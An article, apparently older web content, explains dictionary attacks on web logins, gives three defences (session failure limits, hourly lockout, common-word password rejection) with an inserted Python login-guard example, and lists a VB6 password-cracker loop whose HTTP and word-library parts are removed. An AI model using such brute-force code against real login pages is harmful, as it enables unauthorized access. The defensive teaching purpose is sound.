I wrote this Cracker to gain entry into a client’s Intranet, and did so in 2 minutes with a basic dictionary of 100 words (cat,dog,admin,…). The purpose of this article is to stun you into taking the necessary steps to protect your site. I was prompted to write this article because of posted literature exposing ebay.com susceptibility. If you are looking for a Cracker engine, it is not here. I have removed the communication and word library elements, but the architecture and code are in place so that it is easy to see how entry is gained to your site.
Despite the abundance of security publications, advertisements and television hype describing most unauthorized entry to computers as gained via network vulnerabilities, system flaws, bugs, loopholes, and buffer overflows, the weakest point of any network is the user. Specifically, the user uses a UID of ‘admin’ and a PW of ‘password’ or some other common word. Truly, this is incredibly widespread.
The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).
In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server.
1. To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session, automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times out, the system resets and the user can again gain access with the correct UID/PW.
2. The ‘rate’ of sending UID/PW addresses the number of login attempts within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead, as it would take ~6.8 YEARS to exhaust even the smallest 100-word library.
3. ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compare them against a word library. If the submitted PW is in the library, a different one is requested.
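The three defences above, combined into one login guard, as an added example that is not code from the article (the article's own context is ASP on IIS; this is Python). It assumes an in-memory class named LoginGuard, a constructed COMMON_WORDS set standing in for the article's wordlist.txt, the article's values of 3 attempts and a one-hour lockout, and an injectable clock so the lockout can be exercised without waiting an hour.

```python
import hashlib
import hmac
import secrets
import time

MAX_FAILURES = 3            # failures tolerated per session and per account (point 1 and 2)
LOCKOUT_SECONDS = 3600      # point 2: refuse the account for one hour

# Constructed word library standing in for the article's wordlist.txt (assumption).
COMMON_WORDS = {"cat", "dog", "admin", "password", "123456", "letmein"}


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Salted PBKDF2-SHA256; returns (salt, digest). A fresh salt is drawn if none is given."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


class LoginGuard:
    """Hypothetical login front-end applying the article's three defences."""

    def __init__(self, clock=time.time):
        self.clock = clock                 # injectable so the lockout can be tested
        self.users = {}                    # uid -> (salt, digest)
        self.session_failures = {}         # session id -> failed attempts this session
        self.account_failures = {}         # uid -> consecutive failed attempts
        self.locked_until = {}             # uid -> unix time at which the lock expires

    def set_password(self, uid: str, password: str) -> bool:
        """Point 3: reject a new password that appears in the word library."""
        if password.lower() in COMMON_WORDS:
            return False                   # the caller asks the user for a different one
        self.users[uid] = hash_password(password)
        return True

    def reset_session(self, session_id: str) -> None:
        """Point 1: when the web session times out, the per-session counter is cleared."""
        self.session_failures.pop(session_id, None)

    def login(self, session_id: str, uid: str, password: str) -> str:
        """Returns 'granted', 'denied', 'session_blocked' or 'locked'."""
        now = self.clock()
        # Point 1: three failures in this session block every further attempt,
        # even one carrying the correct UID/PW, until the session is reset.
        if self.session_failures.get(session_id, 0) >= MAX_FAILURES:
            return "session_blocked"
        # Point 2: three failures on this account lock it for an hour,
        # whichever session the attempt arrives from.
        if self.locked_until.get(uid, 0) > now:
            return "locked"

        record = self.users.get(uid)
        # Hash against a dummy record for unknown users so the response time
        # does not reveal which UIDs exist.
        salt, digest = record if record is not None else (b"\x00" * 16, b"\x00" * 32)
        computed = hash_password(password, salt)[1]
        ok = record is not None and hmac.compare_digest(computed, digest)

        if ok:
            self.session_failures.pop(session_id, None)
            self.account_failures.pop(uid, None)
            return "granted"

        self.session_failures[session_id] = self.session_failures.get(session_id, 0) + 1
        self.account_failures[uid] = self.account_failures.get(uid, 0) + 1
        if self.account_failures[uid] >= MAX_FAILURES:
            self.locked_until[uid] = now + LOCKOUT_SECONDS
            self.account_failures.pop(uid, None)   # the count restarts once the lock expires
        return "denied"
```

The per-session counter (point 1) and the per-account lock (point 2) are kept side by side on purpose: the session counter disappears when the session does, so the account lock is what carries the one-hour cost across sessions, while the session counter still cuts off a burst of guesses inside one session immediately. The word-library check in set_password is where point 3 lives; the guard never lets a dictionary word become a stored password in the first place.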
The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW. Using a comma-delimited .txt file of common words, the program builds a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine whether access was granted. When the program is finished, a MsgBox displays the UID/PW that were granted access.
Public Function getDictionary(ByVal strURL As String, _
    ByVal strMethod As String, ByVal strForm As String, _
    ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String
    Dim mHTTP As Object, aryDictionary() As String
    Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String
    ' Read the comma-delimited word library from wordlist.txt next to the .exe
    ApplicationPath = App.Path & "\"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1)
    S = S & TextStream.ReadAll
    TextStream.Close
    DoEvents
    ' Word library and communication elements removed (see above); mHTTP is
    ' never created and aryDictionary is never filled from S in this listing.
    getDictionary = getDictionaryAccess(strForm, UidLimitLen, mHTTP, strMatchNoEntry, aryDictionary)
End Function

Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer, _
    ByRef mHTTP As Object, ByVal strMatchNoEntry As String, _
    ByRef aryDictionary() As String) As String
    'Returns ";" delimited string of params
    'assumes two params of username and password; the exact name values are passed in
    'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"
    'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary
    'the random attack does the 1 to 3 uid and pw matrix
    Dim aryParams As Variant, strTemp As String, aryTemp() As String
    Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String
    ' aryParams is expected to hold the two form field names (username, password);
    ' how it is filled from Params is part of the removed elements.
    iSections = iSections + 1 'iSections allows control of word length
    On Error Resume Next
    For uid = 0 To UBound(aryDictionary)
        For pw = 0 To UBound(aryDictionary)
            If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then
                ' strTemp is the form body for this UID/PW pair
                strTemp = aryParams(0) & "=" & aryDictionary(uid) & "&" & _
                    aryParams(1) & "=" & aryDictionary(pw)
                ' mHTTP engine method call (communication element removed)
                Call IMWaiting(mHTTP)
                ' strResponse = mHTTP engine data retrieval (communication element removed)
                Call IMWaiting(mHTTP)
                strResponse = Replace(strResponse, Chr(13), ";")
                If (strResponse <> "") Then
                    ' If the "no entry" marker is absent, the response is taken as access granted
                    If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then
                        'strSomeAccessPoints has the params that GRANTED ACCESS
                        strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"
                    End If
                End If
                strResponse = ""
                DoEvents
            End If
        Next
    Next
    On Error GoTo 0
    getDictionaryAccess = strSomeAccessPoints
End Function
Please notice that this is very standard programming. Protect yourself!
Article By, Matthew P. Burnett.